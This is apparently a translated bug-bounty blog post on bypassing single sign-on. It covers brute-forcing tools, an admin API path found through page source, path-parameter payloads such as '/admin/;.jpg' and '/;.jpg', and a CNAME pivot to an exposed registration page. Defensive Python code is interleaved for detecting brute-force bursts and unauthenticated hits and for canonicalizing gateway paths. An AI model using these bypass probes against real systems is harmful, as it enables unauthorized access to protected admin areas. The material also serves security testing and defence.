
SSO bypass tips you didn't know about

hussein98d, 迪哥讲事, 2023-07-11

SSO bypasses you didn't know about

Notes on SSO bypass

Commonly used approaches:

1. Brute force

2. Weak passwords

3. Brute-forcing API directories

The brute-force mindset

Don't just look for directories and files: on every valid endpoint, also look for parameters that can be brute-forced.

Related tools:

https://github.com/PortSwigger/param-miner

https://github.com/ffuf/ffuf

https://github.com/s0md3v/Arjun

Fuzzing

https://admin.org.com =====================> ok

https://admin.org.com/blabla =====================> 404

https://admin.org.com/internal.php =====================> 301 Redirect

https://admin.org.com/internal.php?id=1 =====================> 200 ok

APIs

https://admin.org.com =====================> 200 OK then redirect to SSO

view-source:https://admin.org.com =====================> <script src=/admin.js></script> ===================> /api/admin/users

https://admin.org.com/api/admin/users =====================> 200 OK
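From the defender's side, the two patterns above (a burst of 404s from one address as directories are enumerated, and a protected API path answered 200 to a request carrying no SSO session) are both visible in the gateway's access log. The Python below is an added example, not code from the original post or from any of the tools it lists: it runs two simple detections over a constructed, simplified access-log format (timestamp, client IP, method, path, status, and the SSO session cookie name or "-" when absent). The log format, the cookie name SSO_SESSION, the protected prefixes and the burst threshold are assumptions for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed access-log lines (not from any real system). Fields:
#   timestamp ip method path status session
# 'session' is the SSO session cookie name when present, or '-' when absent.
_BASE = datetime(2023, 7, 11, 10, 0, 0, tzinfo=timezone.utc)


def _line(offset_s, ip, method, path, status, session="-"):
    ts = (_BASE + timedelta(seconds=offset_s)).strftime("%Y-%m-%dT%H:%M:%SZ")
    return f"{ts} {ip} {method} {path} {status} {session}"


SAMPLE_LOG = (
    # a normal authenticated user browsing the console
    [_line(0, "198.51.100.7", "GET", "/admin/", 200, "SSO_SESSION"),
     _line(5, "198.51.100.7", "GET", "/api/admin/users", 200, "SSO_SESSION")]
    # a directory brute-force burst: 25 misses in 25 seconds from one address
    + [_line(10 + i, "203.0.113.5", "GET", f"/admin/word{i}", 404) for i in range(25)]
    # an API path answered 200 with no SSO session cookie at all
    + [_line(60, "203.0.113.5", "GET", "/api/admin/users", 200)]
    # a lone 404 from someone else, below the burst threshold
    + [_line(70, "192.0.2.9", "GET", "/admin/typo", 404)]
)


def parse(line):
    """Split one constructed log line into a dict with a timezone-aware timestamp."""
    ts, ip, method, path, status, session = line.split()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
        "ip": ip, "method": method, "path": path,
        "status": int(status), "session": session,
    }


def brute_force_sources(lines, window_seconds=60, threshold=20):
    """Return the set of addresses that produced at least `threshold` 404s
    inside any sliding window of `window_seconds`."""
    by_ip = defaultdict(list)
    for ev in map(parse, lines):
        if ev["status"] == 404:
            by_ip[ev["ip"]].append(ev["ts"])
    flagged = set()
    window = timedelta(seconds=window_seconds)
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # advance the window start until it fits within window_seconds of `end`
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(ip)
                break
    return flagged


def unauthenticated_protected_hits(lines, protected_prefixes=("/admin", "/api/admin")):
    """Return (ip, path) pairs where a protected path was served 200 to a request
    that carried no SSO session: exactly the symptom of an unprotected API route."""
    hits = []
    for ev in map(parse, lines):
        if (ev["status"] == 200 and ev["session"] == "-"
                and ev["path"].startswith(protected_prefixes)):
            hits.append((ev["ip"], ev["path"]))
    return hits


if __name__ == "__main__":
    print("brute-force sources:", brute_force_sources(SAMPLE_LOG))
    print("unauthenticated protected hits:", unauthenticated_protected_hits(SAMPLE_LOG))
```

The second check is the more valuable one: a single 200 on a protected prefix without a session is not noise to be thresholded, it is a coverage gap in the SSO gateway's route list and should be triaged as such.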

A lesser-known wordlist

https://gist.github.com/richard1230/8186e508163b7ed251345c9214433add

https://org.com/admin/$FUZZ$

Lesser-known bypass tricks

https://org.com/admin/;.jpg
https://org.com/admin/valid-file.jsp;.jpg



https://internal.org.com =====================> sso
https://internal.org.com/test.js =====================> sso
https://internal.org.com/test.jpg =====================> 404
https://internal.org.com/;.jpg =====================> 200 ok
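The ;.jpg probes above succeed when the SSO gateway decides on the raw request path (it ends in .jpg, so it looks like a static asset and is exempted) while the application server behind it strips the ;.jpg path parameter and serves /admin/ or / as usual. The Python below is an added example, not code from the original post or any real gateway: it places a weak, suffix-based exemption rule next to a hardened one that canonicalizes the path the way a typical servlet container would (percent-decode, drop ; path parameters per segment, resolve dot segments) and then exempts only a dedicated static prefix. The /static/ prefix, the extension list and the canonicalization rules are assumptions for illustration.

```python
import re
from urllib.parse import unquote

# Constructed SSO-gateway exemption logic (illustrative, not any product's code).
STATIC_EXT_RE = re.compile(r"\.(?:jpg|jpeg|png|gif|css|ico)$", re.IGNORECASE)
STATIC_PREFIX = "/static/"   # assumed location of genuinely public assets


def weak_is_exempt(raw_path: str) -> bool:
    """Weak rule: match the raw path as received.
    '/admin/;.jpg' ends in '.jpg', so it is exempted from SSO."""
    return bool(STATIC_EXT_RE.search(raw_path))


def canonicalize(raw_path: str) -> str:
    """Normalize the path the way the backend will before routing:
    percent-decode, strip ';...' path parameters from every segment,
    and resolve '.' and '..' segments."""
    path = unquote(raw_path)
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]   # '/admin/;.jpg' -> segments '', 'admin', ''
        if seg == "..":
            if out:
                out.pop()
        elif seg != ".":
            out.append(seg)
    canon = "/".join(out)
    return canon if canon.startswith("/") else "/" + canon


def hardened_is_exempt(raw_path: str) -> bool:
    """Hardened rule: decide on the canonical path, and only for a dedicated
    static prefix. Anything that canonicalizes to /admin/... or / falls
    through to SSO regardless of what suffix was appended."""
    canon = canonicalize(raw_path)
    return canon.startswith(STATIC_PREFIX) and bool(STATIC_EXT_RE.search(canon))


def compare(probes):
    """Return {probe: (weak_verdict, hardened_verdict, canonical_path)} for review."""
    return {p: (weak_is_exempt(p), hardened_is_exempt(p), canonicalize(p)) for p in probes}


if __name__ == "__main__":
    # Constructed probes mirroring the shapes shown in the post.
    for probe, verdict in compare([
        "/admin/;.jpg",
        "/admin/valid-file.jsp;.jpg",
        "/;.jpg",
        "/admin/%3b.jpg",
        "/static/logo.png",
        "/static/../admin/x.png",
    ]).items():
        print(f"{probe:32} weak_exempt={verdict[0]!s:5} hardened_exempt={verdict[1]!s:5} -> {verdict[2]}")
```

The design point is that the exemption decision and the routing decision must be made on the same string. Matching on a suffix of the raw path lets every request smuggle a benign-looking tail past the gateway; matching on a canonical path against an allow-list of public prefixes leaves nothing for the tail to change.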



https://internal.org.com =====================> sso
dig CNAME internal.org.com =====================> org.3rdparty.com
gau --subs 3rdparty.com =====================> hey.3rdparty.com/authentication/register
https://internal.org.com/authentication/register =====================> 200 ok


